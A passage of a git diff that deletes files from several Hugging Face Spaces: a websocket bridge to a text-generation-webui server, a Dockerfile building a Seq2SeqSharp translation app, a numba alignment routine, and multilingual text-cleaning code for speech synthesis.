parsed.prerelease.length) ? parsed.prerelease : null -} -module.exports = prerelease diff --git a/spaces/zhanghaohui/szu-gpt-academic/request_llm/bridge_tgui.py b/spaces/zhanghaohui/szu-gpt-academic/request_llm/bridge_tgui.py deleted file mode 100644 index fcf852f0474892bd179843ece3f4a83110bd7756..0000000000000000000000000000000000000000 --- a/spaces/zhanghaohui/szu-gpt-academic/request_llm/bridge_tgui.py +++ /dev/null @@ -1,171 +0,0 @@ -''' -Contributed by SagsMug. 
Modified by binary-husky -https://github.com/oobabooga/text-generation-webui/pull/175 -''' - -import asyncio -import json -import random -import string -import websockets -import logging -import time -import threading -import importlib -from toolbox import get_conf, update_ui - - -def random_hash(): - letters = string.ascii_lowercase + string.digits - return ''.join(random.choice(letters) for i in range(9)) - -async def run(context, max_token, temperature, top_p, addr, port): - params = { - 'max_new_tokens': max_token, - 'do_sample': True, - 'temperature': temperature, - 'top_p': top_p, - 'typical_p': 1, - 'repetition_penalty': 1.05, - 'encoder_repetition_penalty': 1.0, - 'top_k': 0, - 'min_length': 0, - 'no_repeat_ngram_size': 0, - 'num_beams': 1, - 'penalty_alpha': 0, - 'length_penalty': 1, - 'early_stopping': True, - 'seed': -1, - } - session = random_hash() - - async with websockets.connect(f"ws://{addr}:{port}/queue/join") as websocket: - while content := json.loads(await websocket.recv()): - #Python3.10 syntax, replace with if elif on older - if content["msg"] == "send_hash": - await websocket.send(json.dumps({ - "session_hash": session, - "fn_index": 12 - })) - elif content["msg"] == "estimation": - pass - elif content["msg"] == "send_data": - await websocket.send(json.dumps({ - "session_hash": session, - "fn_index": 12, - "data": [ - context, - params['max_new_tokens'], - params['do_sample'], - params['temperature'], - params['top_p'], - params['typical_p'], - params['repetition_penalty'], - params['encoder_repetition_penalty'], - params['top_k'], - params['min_length'], - params['no_repeat_ngram_size'], - params['num_beams'], - params['penalty_alpha'], - params['length_penalty'], - params['early_stopping'], - params['seed'], - ] - })) - elif content["msg"] == "process_starts": - pass - elif content["msg"] in ["process_generating", "process_completed"]: - yield content["output"]["data"][0] - # You can search for your desired end indicator and - # stop generation by closing the websocket here - if (content["msg"] == "process_completed"): - break - - - - - -def predict(inputs, llm_kwargs, plugin_kwargs, chatbot, history=[], system_prompt='', stream = True, additional_fn=None): - """ - 发送至chatGPT,流式获取输出。 - 用于基础的对话功能。 - inputs 是本次问询的输入 - top_p, temperature是chatGPT的内部调优参数 - history 是之前的对话列表(注意无论是inputs还是history,内容太长了都会触发token数量溢出的错误) - chatbot 为WebUI中显示的对话列表,修改它,然后yeild出去,可以直接修改对话界面内容 - additional_fn代表点击的哪个按钮,按钮见functional.py - """ - if additional_fn is not None: - import core_functional - importlib.reload(core_functional) # 热更新prompt - core_functional = core_functional.get_core_functions() - if "PreProcess" in core_functional[additional_fn]: inputs = core_functional[additional_fn]["PreProcess"](inputs) # 获取预处理函数(如果有的话) - inputs = core_functional[additional_fn]["Prefix"] + inputs + core_functional[additional_fn]["Suffix"] - - raw_input = "What I would like to say is the following: " + inputs - history.extend([inputs, ""]) - chatbot.append([inputs, ""]) - yield from update_ui(chatbot=chatbot, history=history, msg="等待响应") # 刷新界面 - - prompt = raw_input - tgui_say = "" - - model_name, addr_port = llm_kwargs['llm_model'].split('@') - assert ':' in addr_port, "LLM_MODEL 格式不正确!" 
+ llm_kwargs['llm_model'] - addr, port = addr_port.split(':') - - - mutable = ["", time.time()] - def run_coorotine(mutable): - async def get_result(mutable): - # "tgui:galactica-1.3b@localhost:7860" - - async for response in run(context=prompt, max_token=llm_kwargs['max_length'], - temperature=llm_kwargs['temperature'], - top_p=llm_kwargs['top_p'], addr=addr, port=port): - print(response[len(mutable[0]):]) - mutable[0] = response - if (time.time() - mutable[1]) > 3: - print('exit when no listener') - break - asyncio.run(get_result(mutable)) - - thread_listen = threading.Thread(target=run_coorotine, args=(mutable,), daemon=True) - thread_listen.start() - - while thread_listen.is_alive(): - time.sleep(1) - mutable[1] = time.time() - # Print intermediate steps - if tgui_say != mutable[0]: - tgui_say = mutable[0] - history[-1] = tgui_say - chatbot[-1] = (history[-2], history[-1]) - yield from update_ui(chatbot=chatbot, history=history) # 刷新界面 - - - - -def predict_no_ui_long_connection(inputs, llm_kwargs, history, sys_prompt, observe_window, console_slience=False): - raw_input = "What I would like to say is the following: " + inputs - prompt = raw_input - tgui_say = "" - model_name, addr_port = llm_kwargs['llm_model'].split('@') - assert ':' in addr_port, "LLM_MODEL 格式不正确!" + llm_kwargs['llm_model'] - addr, port = addr_port.split(':') - - - def run_coorotine(observe_window): - async def get_result(observe_window): - async for response in run(context=prompt, max_token=llm_kwargs['max_length'], - temperature=llm_kwargs['temperature'], - top_p=llm_kwargs['top_p'], addr=addr, port=port): - print(response[len(observe_window[0]):]) - observe_window[0] = response - if (time.time() - observe_window[1]) > 5: - print('exit when no listener') - break - asyncio.run(get_result(observe_window)) - thread_listen = threading.Thread(target=run_coorotine, args=(observe_window,)) - thread_listen.start() - return observe_window[0] diff --git a/spaces/zhongkaifu/mt_jpnkor_chs/Dockerfile b/spaces/zhongkaifu/mt_jpnkor_chs/Dockerfile deleted file mode 100644 index 8ea97f1803993fdd07a17e8c688e88762ecb5b45..0000000000000000000000000000000000000000 --- a/spaces/zhongkaifu/mt_jpnkor_chs/Dockerfile +++ /dev/null @@ -1,50 +0,0 @@ -# read the doc: https://huggingface.co/docs/hub/spaces-sdks-docker -# you will also find guides on how best to write your Dockerfile - -FROM python:3.9 - -WORKDIR /code - -COPY ./requirements.txt /code/requirements.txt - -RUN pip install --no-cache-dir --upgrade -r /code/requirements.txt - -RUN wget https://packages.microsoft.com/config/ubuntu/18.04/packages-microsoft-prod.deb -O packages-microsoft-prod.deb -RUN dpkg -i packages-microsoft-prod.deb -RUN rm packages-microsoft-prod.deb - -RUN curl -s https://packagecloud.io/install/repositories/github/git-lfs/script.deb.sh - -RUN apt-get update -RUN apt-get install -y dotnet-sdk-7.0 -RUN apt-get install -y aspnetcore-runtime-7.0 -RUN apt-get install -y cmake -RUN apt-get install -y git-lfs - -RUN git clone https://github.com/zhongkaifu/Seq2SeqSharp.git -WORKDIR /code/Seq2SeqSharp -RUN dotnet build Seq2SeqSharp.sln --configuration Release - -WORKDIR /code/Seq2SeqSharp/ExternalProjects -RUN unzip SentencePiece.zip -WORKDIR /code/Seq2SeqSharp/ExternalProjects/SentencePiece -RUN mkdir build -WORKDIR /code/Seq2SeqSharp/ExternalProjects/SentencePiece/build -RUN cmake .. 
-RUN make -j $(nproc) -RUN make install -RUN ldconfig -v - -WORKDIR /code - -RUN mkdir -p /code/bin -RUN chmod 777 /code/bin -WORKDIR /code/bin - -RUN cp -r /code/Seq2SeqSharp/Tools/SeqWebApps/bin/Release/net7.0/* . -RUN wget https://github.com/zhongkaifu/Models/releases/download/MT_KORJPN_CHS/mt_cjk_chs.model -RUN wget https://huggingface.co/zhongkaifu/mt_jpnkor_chs/resolve/main/cjkSpm.model -RUN rm appsettings.json -RUN wget https://huggingface.co/zhongkaifu/mt_jpnkor_chs/resolve/main/appsettings.json - -CMD ["dotnet","/code/bin/SeqWebApps.dll"] \ No newline at end of file diff --git a/spaces/zomehwh/bert_vits2/monotonic_align/core.py b/spaces/zomehwh/bert_vits2/monotonic_align/core.py deleted file mode 100644 index 7c962adea65543ef426034c4d53c4f0e615e8181..0000000000000000000000000000000000000000 --- a/spaces/zomehwh/bert_vits2/monotonic_align/core.py +++ /dev/null @@ -1,46 +0,0 @@ -import numba - - -@numba.jit( - numba.void( - numba.int32[:, :, ::1], - numba.float32[:, :, ::1], - numba.int32[::1], - numba.int32[::1], - ), - nopython=True, - nogil=True, -) -def maximum_path_jit(paths, values, t_ys, t_xs): - b = paths.shape[0] - max_neg_val = -1e9 - for i in range(int(b)): - path = paths[i] - value = values[i] - t_y = t_ys[i] - t_x = t_xs[i] - - v_prev = v_cur = 0.0 - index = t_x - 1 - - for y in range(t_y): - for x in range(max(0, t_x + y - t_y), min(t_x, y + 1)): - if x == y: - v_cur = max_neg_val - else: - v_cur = value[y - 1, x] - if x == 0: - if y == 0: - v_prev = 0.0 - else: - v_prev = max_neg_val - else: - v_prev = value[y - 1, x - 1] - value[y, x] += max(v_prev, v_cur) - - for y in range(t_y - 1, -1, -1): - path[y, index] = 1 - if index != 0 and ( - index == y or value[y - 1, index] < value[y - 1, index - 1] - ): - index = index - 1 diff --git a/spaces/zomehwh/vits-models-genshin-bh3/text/cleaners.py b/spaces/zomehwh/vits-models-genshin-bh3/text/cleaners.py deleted file mode 100644 index 68c9ad24d5a303b68a521fba2e8776c8cc867356..0000000000000000000000000000000000000000 --- a/spaces/zomehwh/vits-models-genshin-bh3/text/cleaners.py +++ /dev/null @@ -1,475 +0,0 @@ -""" from https://github.com/keithito/tacotron """ - -''' -Cleaners are transformations that run over the input text at both training and eval time. - -Cleaners can be selected by passing a comma-delimited list of cleaner names as the "cleaners" -hyperparameter. Some cleaners are English-specific. You'll typically want to use: - 1. "english_cleaners" for English text - 2. "transliteration_cleaners" for non-English text that can be transliterated to ASCII using - the Unidecode library (https://pypi.python.org/pypi/Unidecode) - 3. "basic_cleaners" if you do not want to transliterate (in this case, you should also update - the symbols in symbols.py to match your data). -''' - -import re -from unidecode import unidecode -import pyopenjtalk -from jamo import h2j, j2hcj -from pypinyin import lazy_pinyin, BOPOMOFO -import jieba, cn2an - - -# This is a list of Korean classifiers preceded by pure Korean numerals. 
-_korean_classifiers = '군데 권 개 그루 닢 대 두 마리 모 모금 뭇 발 발짝 방 번 벌 보루 살 수 술 시 쌈 움큼 정 짝 채 척 첩 축 켤레 톨 통' - -# Regular expression matching whitespace: -_whitespace_re = re.compile(r'\s+') - -# Regular expression matching Japanese without punctuation marks: -_japanese_characters = re.compile(r'[A-Za-z\d\u3005\u3040-\u30ff\u4e00-\u9fff\uff11-\uff19\uff21-\uff3a\uff41-\uff5a\uff66-\uff9d]') - -# Regular expression matching non-Japanese characters or punctuation marks: -_japanese_marks = re.compile(r'[^A-Za-z\d\u3005\u3040-\u30ff\u4e00-\u9fff\uff11-\uff19\uff21-\uff3a\uff41-\uff5a\uff66-\uff9d]') - -# List of (regular expression, replacement) pairs for abbreviations: -_abbreviations = [(re.compile('\\b%s\\.' % x[0], re.IGNORECASE), x[1]) for x in [ - ('mrs', 'misess'), - ('mr', 'mister'), - ('dr', 'doctor'), - ('st', 'saint'), - ('co', 'company'), - ('jr', 'junior'), - ('maj', 'major'), - ('gen', 'general'), - ('drs', 'doctors'), - ('rev', 'reverend'), - ('lt', 'lieutenant'), - ('hon', 'honorable'), - ('sgt', 'sergeant'), - ('capt', 'captain'), - ('esq', 'esquire'), - ('ltd', 'limited'), - ('col', 'colonel'), - ('ft', 'fort'), -]] - -# List of (hangul, hangul divided) pairs: -_hangul_divided = [(re.compile('%s' % x[0]), x[1]) for x in [ - ('ㄳ', 'ㄱㅅ'), - ('ㄵ', 'ㄴㅈ'), - ('ㄶ', 'ㄴㅎ'), - ('ㄺ', 'ㄹㄱ'), - ('ㄻ', 'ㄹㅁ'), - ('ㄼ', 'ㄹㅂ'), - ('ㄽ', 'ㄹㅅ'), - ('ㄾ', 'ㄹㅌ'), - ('ㄿ', 'ㄹㅍ'), - ('ㅀ', 'ㄹㅎ'), - ('ㅄ', 'ㅂㅅ'), - ('ㅘ', 'ㅗㅏ'), - ('ㅙ', 'ㅗㅐ'), - ('ㅚ', 'ㅗㅣ'), - ('ㅝ', 'ㅜㅓ'), - ('ㅞ', 'ㅜㅔ'), - ('ㅟ', 'ㅜㅣ'), - ('ㅢ', 'ㅡㅣ'), - ('ㅑ', 'ㅣㅏ'), - ('ㅒ', 'ㅣㅐ'), - ('ㅕ', 'ㅣㅓ'), - ('ㅖ', 'ㅣㅔ'), - ('ㅛ', 'ㅣㅗ'), - ('ㅠ', 'ㅣㅜ') -]] - -# List of (Latin alphabet, hangul) pairs: -_latin_to_hangul = [(re.compile('%s' % x[0], re.IGNORECASE), x[1]) for x in [ - ('a', '에이'), - ('b', '비'), - ('c', '시'), - ('d', '디'), - ('e', '이'), - ('f', '에프'), - ('g', '지'), - ('h', '에이치'), - ('i', '아이'), - ('j', '제이'), - ('k', '케이'), - ('l', '엘'), - ('m', '엠'), - ('n', '엔'), - ('o', '오'), - ('p', '피'), - ('q', '큐'), - ('r', '아르'), - ('s', '에스'), - ('t', '티'), - ('u', '유'), - ('v', '브이'), - ('w', '더블유'), - ('x', '엑스'), - ('y', '와이'), - ('z', '제트') -]] - -# List of (Latin alphabet, bopomofo) pairs: -_latin_to_bopomofo = [(re.compile('%s' % x[0], re.IGNORECASE), x[1]) for x in [ - ('a', 'ㄟˉ'), - ('b', 'ㄅㄧˋ'), - ('c', 'ㄙㄧˉ'), - ('d', 'ㄉㄧˋ'), - ('e', 'ㄧˋ'), - ('f', 'ㄝˊㄈㄨˋ'), - ('g', 'ㄐㄧˋ'), - ('h', 'ㄝˇㄑㄩˋ'), - ('i', 'ㄞˋ'), - ('j', 'ㄐㄟˋ'), - ('k', 'ㄎㄟˋ'), - ('l', 'ㄝˊㄛˋ'), - ('m', 'ㄝˊㄇㄨˋ'), - ('n', 'ㄣˉ'), - ('o', 'ㄡˉ'), - ('p', 'ㄆㄧˉ'), - ('q', 'ㄎㄧㄡˉ'), - ('r', 'ㄚˋ'), - ('s', 'ㄝˊㄙˋ'), - ('t', 'ㄊㄧˋ'), - ('u', 'ㄧㄡˉ'), - ('v', 'ㄨㄧˉ'), - ('w', 'ㄉㄚˋㄅㄨˋㄌㄧㄡˋ'), - ('x', 'ㄝˉㄎㄨˋㄙˋ'), - ('y', 'ㄨㄞˋ'), - ('z', 'ㄗㄟˋ') -]] - - -# List of (bopomofo, romaji) pairs: -_bopomofo_to_romaji = [(re.compile('%s' % x[0], re.IGNORECASE), x[1]) for x in [ - ('ㄅㄛ', 'p⁼wo'), - ('ㄆㄛ', 'pʰwo'), - ('ㄇㄛ', 'mwo'), - ('ㄈㄛ', 'fwo'), - ('ㄅ', 'p⁼'), - ('ㄆ', 'pʰ'), - ('ㄇ', 'm'), - ('ㄈ', 'f'), - ('ㄉ', 't⁼'), - ('ㄊ', 'tʰ'), - ('ㄋ', 'n'), - ('ㄌ', 'l'), - ('ㄍ', 'k⁼'), - ('ㄎ', 'kʰ'), - ('ㄏ', 'h'), - ('ㄐ', 'ʧ⁼'), - ('ㄑ', 'ʧʰ'), - ('ㄒ', 'ʃ'), - ('ㄓ', 'ʦ`⁼'), - ('ㄔ', 'ʦ`ʰ'), - ('ㄕ', 's`'), - ('ㄖ', 'ɹ`'), - ('ㄗ', 'ʦ⁼'), - ('ㄘ', 'ʦʰ'), - ('ㄙ', 's'), - ('ㄚ', 'a'), - ('ㄛ', 'o'), - ('ㄜ', 'ə'), - ('ㄝ', 'e'), - ('ㄞ', 'ai'), - ('ㄟ', 'ei'), - ('ㄠ', 'au'), - ('ㄡ', 'ou'), - ('ㄧㄢ', 'yeNN'), - ('ㄢ', 'aNN'), - ('ㄧㄣ', 'iNN'), - ('ㄣ', 'əNN'), - ('ㄤ', 'aNg'), - ('ㄧㄥ', 'iNg'), - ('ㄨㄥ', 'uNg'), - ('ㄩㄥ', 'yuNg'), - ('ㄥ', 'əNg'), - ('ㄦ', 'əɻ'), - ('ㄧ', 'i'), - ('ㄨ', 'u'), - ('ㄩ', 'ɥ'), - ('ˉ', '→'), - ('ˊ', '↑'), - ('ˇ', '↓↑'), - ('ˋ', 
'↓'), - ('˙', ''), - (',', ','), - ('。', '.'), - ('!', '!'), - ('?', '?'), - ('—', '-') -]] - - -def expand_abbreviations(text): - for regex, replacement in _abbreviations: - text = re.sub(regex, replacement, text) - return text - - -def lowercase(text): - return text.lower() - - -def collapse_whitespace(text): - return re.sub(_whitespace_re, ' ', text) - - -def convert_to_ascii(text): - return unidecode(text) - - -def japanese_to_romaji_with_accent(text): - '''Reference https://r9y9.github.io/ttslearn/latest/notebooks/ch10_Recipe-Tacotron.html''' - sentences = re.split(_japanese_marks, text) - marks = re.findall(_japanese_marks, text) - text = '' - for i, sentence in enumerate(sentences): - if re.match(_japanese_characters, sentence): - if text!='': - text+=' ' - labels = pyopenjtalk.extract_fullcontext(sentence) - for n, label in enumerate(labels): - phoneme = re.search(r'\-([^\+]*)\+', label).group(1) - if phoneme not in ['sil','pau']: - text += phoneme.replace('ch','ʧ').replace('sh','ʃ').replace('cl','Q') - else: - continue - n_moras = int(re.search(r'/F:(\d+)_', label).group(1)) - a1 = int(re.search(r"/A:(\-?[0-9]+)\+", label).group(1)) - a2 = int(re.search(r"\+(\d+)\+", label).group(1)) - a3 = int(re.search(r"\+(\d+)/", label).group(1)) - if re.search(r'\-([^\+]*)\+', labels[n + 1]).group(1) in ['sil','pau']: - a2_next=-1 - else: - a2_next = int(re.search(r"\+(\d+)\+", labels[n + 1]).group(1)) - # Accent phrase boundary - if a3 == 1 and a2_next == 1: - text += ' ' - # Falling - elif a1 == 0 and a2_next == a2 + 1 and a2 != n_moras: - text += '↓' - # Rising - elif a2 == 1 and a2_next == 2: - text += '↑' - if i